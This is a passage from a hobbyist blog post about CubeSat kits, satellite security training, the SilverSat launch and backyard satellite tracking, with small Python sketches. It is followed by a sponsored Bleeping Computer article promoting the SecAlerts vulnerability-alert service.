The MySat ranges from about $130 for a basic kit where you 3D print your own frame, up to $300 for a full kit including deployable solar panels.
On the higher end, there's RASCube, and Edward Robinson, the 21-year-old founder of Robinson Space, sent it over after he saw me posting about CubeSats online.
The RASCube comes from Australia, and Edward's mission is to teach students about space through hands-on building.
I just built this LS version of the cube last week; it's the little brother to their V2 design, which flew in space on a Falcon 9 rocket earlier this year.
Like MySat, you build the kit with an EPS board for power, a computer board with all the controls, and a radio board that ties in GPS and radio comms.
The RASCubes are a bit more expensive, coming in at around $430 each for the LS, and $600 each for the full aluminum V2s. But that price tag also covers full lesson plans and resources for teachers.
I love these things—all the people I've talked to on this journey are motivated by the same thing: learning about space, electronics, and integrating hardware in a new way, and sharing what they learn with others, especially students.
One thing I learned from the first flight test was how weird it is to have your Pi go from overheating on the ground, to getting really cold as it climbs, to overheating again in the upper atmosphere because there's not enough air to dissipate heat!
You start to realize some of the crazy physical conditions you'll deal with on orbit.
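A back-of-the-envelope radiation balance shows why: in vacuum the only way out for heat is radiating it away, so equilibrium temperature follows from P = εσAT⁴. The board size, emissivity, and power numbers below are assumptions for illustration:

```python
# Toy thermal balance for a bare, Pi-Zero-sized board in vacuum. All values
# are illustrative assumptions, not measurements from any real CubeSat.
SIGMA = 5.670e-8               # Stefan-Boltzmann constant, W/(m^2 K^4)
eps = 0.9                      # assumed emissivity (and solar absorptivity)
area_rad = 2 * 0.065 * 0.030   # radiating area: both faces of a 65x30 mm board
area_sun = 0.065 * 0.030       # projected area facing the Sun
electronics = 1.0              # watts dissipated by the computer (assumed)
solar = 1361 * eps * area_sun  # absorbed sunlight at Earth distance, W

for label, power in [("eclipse (electronics only)", electronics),
                     ("full sun", electronics + solar)]:
    temp = (power / (eps * SIGMA * area_rad)) ** 0.25  # radiative equilibrium
    print(f"{label}: {temp:.0f} K ({temp - 273.15:.0f} degC)")
```

Under these made-up numbers the same board swings from around -7 °C in eclipse to almost 90 °C in full sun, with no air to smooth out the difference.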
Back down to earth, though, for CubeSat Tempest: the whole reason this exists is to help people learn why security is important, even for a tiny CubeSat. More importantly, Tim Fowler's course teaches people how to secure things like uplinks (see: the ground station pictured above) and flight control systems.
There are so many people like Tim, who work in their free time to try to teach about space, or engineering, or just small slices of things like security, using these tactile little cubes you can build and put next to your laptop on a desk.
It's crazy to think we're at a point where students can build these things, write flight control software, and even launch 'em into space!
There's another CubeSat with a Raspberry Pi onboard, and it's launching NET Sunday at 6:11 p.m. Eastern time, aboard a Falcon 9 rocket. What does NET mean? Well, as I found out when I visited Florida this summer, it means "No Earlier Than", and in spaceflight, many things delay launches.
The students who built SilverSat are no strangers to delays—they were originally supposed to see their CubeSat launch earlier this year, but the cargo module they were on got damaged during transport, and that delayed them for months.
I got to talk to two of the adults guiding the students through their first space launch, and we discussed the history of the project (it started up in 2017), how they are supported by NASA's CubeSat Launch Initiative, the importance of amateur radio for CubeSats, and why they chose a Raspberry Pi Zero for their onboard computer.
That interview is tucked away in the last half of the video at the top of this post.
Tracking Satellites from your backyard
Also in that video, I spoke to Gabe from saveitforparts, and he mentioned it's not that difficult to listen in on satellites on orbit—including amateur CubeSats!
SilverSat will be broadcasting SSDV (Slow-Scan Digital Video) at set times, and the schedule for that should be posted on their website.
Check out the video embedded in this post (near the top), or Gabe's own channel for ideas for tracking satellites. It can be done with under $100 of equipment (usually just an SDR and a cheap antenna).
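For a sense of how little code pass prediction takes, here's a sketch using the Skyfield library and CelesTrak's amateur-satellite TLEs; the observer coordinates and the choice of satellite are placeholders to swap for your own:

```python
# Sketch: predict upcoming passes of an amateur satellite over your location.
# Requires: pip install skyfield. The CelesTrak group URL is real; the
# observer location and altitude cutoff are placeholder assumptions.
from datetime import timedelta
from skyfield.api import load, wgs84

ts = load.timescale()
url = "https://celestrak.org/NORAD/elements/gp.php?GROUP=amateur&FORMAT=tle"
sat = load.tle_file(url)[0]  # first satellite in the group; pick yours by name

observer = wgs84.latlon(40.0, -75.0)  # replace with your latitude/longitude

t0 = ts.now()
t1 = ts.from_datetime(t0.utc_datetime() + timedelta(days=1))
times, events = sat.find_events(observer, t0, t1, altitude_degrees=10.0)
labels = ("rise above 10 deg", "culminate", "set below 10 deg")
for t, event in zip(times, events):
    print(t.utc_strftime("%Y-%m-%d %H:%M:%S"), labels[event])
```

Point a cheap SDR and antenna at the sky during one of those windows and you're listening to a satellite.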
Infectious Enthusiasm for Learning (and Teaching)
I feel like a broken record, but one thing I love about talking to anyone in the CubeSat community is the sense of infectious enthusiasm. I was going to cut this video out for time, but watching it back, I realized other people would probably enjoy Tim showing off some neat CubeSats from his personal collection as much as I did. So I put up some bonus content on my second channel, Level 2 Jeff; you can watch another 8 minutes of CubeSat hardware below:
Thank you to everyone who taught me about CubeSats for this video and blog post.
Stop waiting on NVD — get real-time vulnerability alerts now
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 15:01:11
Vulnerabilities are discovered daily—but not every alert matters. SecAlerts pulls from 100+ sources for faster, real-time vuln alerts, filtering the noise so teams can patch quicker and stay secure. [...]
In today’s fast-paced digital environment, cybersecurity is no longer optional - it’s essential. Vulnerability management has become a core component of every security strategy and keeping track of vulnerability alerts is an issue facing many businesses.
It doesn’t take much for even a small business to have hundreds, if not thousands, of software packages across their systems. With nearly 10% of vulnerabilities exploited in 2024, a business could easily have dozens of possible breaches in the offing if immediate remediation doesn’t occur.
Tracking every vulnerability update, alert and notification manually can be daunting and time-consuming. The last thing security officers and teams want is to be bombarded with vulnerability information. They require a service that saves them time and delivers relevant and actionable vuln info to them as soon as possible.
Traditional vulnerability management products are often expensive, complex, and difficult to implement, which acts as a barrier for businesses lacking either the security budget or teams. Not everyone needs a suite of products. Even when vulnerability alerts are catered for, there is the possibility of having to log in to a product and search for the information.
Use filters to reduce the noise, so you receive relevant vulnerabilities.
Delivering What You Need
An alternative to offering a suite of products is to provide one streamlined, easy-to-use, affordable service.
SecAlerts does just that. It saves valuable time by delivering vulnerability alerts directly to you as soon as the information is released. Other services often rely solely on NVD and pass on any delays - often lengthy - that may occur. SecAlerts avoids wait times by using 100+ sources, including vendors, researchers, forums, and blogs, to provide up-to-the-minute vulnerability alerts.
Noise is one issue facing security personnel, who often have to wade through a mountain of vulnerability information. Spending time finding the vulnerabilities that need to be dealt with can lead to delays in updating software, leaving businesses open to attack.
SecAlerts allows you to filter out the noise, so you only receive vulnerability alerts you want to see. If, for example, you want to view critical Microsoft vulnerabilities with a CVSS of 8 - 10 that have been exploited in the past week, you can.
Create Alerts to notify you about new vulnerabilities matching your search criteria
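That kind of filter, expressed as plain Python over a list of alert records, might look like the sketch below; the field names are illustrative guesses, not SecAlerts' actual schema:

```python
# Hypothetical alert records -- field names are illustrative assumptions,
# not SecAlerts' documented data model.
from datetime import datetime, timedelta, timezone

now = datetime.now(timezone.utc)
alerts = [
    {"cve": "CVE-2025-0001", "vendor": "Microsoft", "cvss": 9.8,
     "known_exploited": True, "published": now - timedelta(days=2)},
    {"cve": "CVE-2025-0002", "vendor": "Adobe", "cvss": 7.5,
     "known_exploited": False, "published": now - timedelta(days=30)},
]

# Critical Microsoft vulns (CVSS 8-10), exploited, published in the past week.
one_week_ago = now - timedelta(days=7)
urgent = [a for a in alerts
          if a["vendor"] == "Microsoft"
          and 8.0 <= a["cvss"] <= 10.0
          and a["known_exploited"]
          and a["published"] >= one_week_ago]
print([a["cve"] for a in urgent])  # -> ['CVE-2025-0001']
```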
How SecAlerts Works
SecAlerts breaks down the process of receiving vulnerability information into three core components – Stacks, Channels and Alerts:
Stacks: Upload your software to SecAlerts from multiple endpoints, code repositories or a custom collection. This can be done manually, via a file (CSV, XLSX, SPDX) or a local scan (npm or curl), which runs a script on your endpoint and builds an SBOM.
Channels: Choose who in your business receives the vulnerability information and how it is received – e.g. Email, Slack, Teams, Webhook.
Alerts: Bring together your Stacks and Channels, so that the right people in your business receive relevant vulnerability information, delivered directly to them at a frequency of their choosing. It's here that you can reduce the noise with one or more filters, including Severity, Known Exploited, EPSS and Trending.
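As a sketch of what a Webhook channel could feed on the receiving end, here's a minimal HTTP handler that pages on-call only for high-severity items; the JSON payload shape is a hypothetical stand-in, not SecAlerts' published format:

```python
# Minimal webhook receiver for vulnerability alerts. The payload field names
# (cve, cvss, package) are hypothetical, not SecAlerts' actual schema.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

class AlertHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        alert = json.loads(self.rfile.read(length))
        # Forward only high-severity items to the on-call channel.
        if alert.get("cvss", 0) >= 8.0:
            print(f"PAGE on-call: {alert.get('cve')} affects {alert.get('package')}")
        self.send_response(204)  # acknowledge receipt, no body
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), AlertHandler).serve_forever()
```

In practice you'd also authenticate incoming requests; the real payload contract is whatever SecAlerts documents.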
The Dashboard lets you see your vulnerability information in one location
Your Dashboard
Once you’ve added your software, all the relevant vulnerability information will populate your client Dashboard where, as well as your Stacks, Channels and Alerts, you can also see:
Vulnerabilities affecting your software over any period of time you choose.
Extended data for each vulnerability, including its origin, e.g. MITRE, GitHub.
Which software and versions have been affected.
Reference links for each vulnerability.
Our filters further allow you to pare down your vulnerabilities, so you only view the ones relevant to you.
If you look after, say, several departments within your business, each with their own software, Properties is where you can give each department its own “page”, with Stacks, Channels, and Alerts unique to them.
Properties is especially popular with MSPs wanting to handle their clients in one place.
Each Property contains its own vulnerability information, including Stacks, Channels and Alerts.
Game-Changer
SecAlerts’ global client-base covers five continents and a wide range of industries and businesses, including universities, intelligence agencies, startups, banks, government departments, aviation and cyber insurers.
Many of these businesses incorporate SecAlerts into their cyber security arsenal alongside other products, due to its easy-to-use functionality and the ability to filter out the noise and deliver relevant, actionable, up-to-the-minute vulnerability alerts directly to them – all at an affordable price.
"Staying ahead of vulnerabilities is critical and SecAlerts has been an absolute game-changer,"
shared a UK customer.
"It provides real-time alerts on security threats based on our requirements, helping us proactively address risks before they become major issues. We’ve strengthened our security posture and improved response times significantly."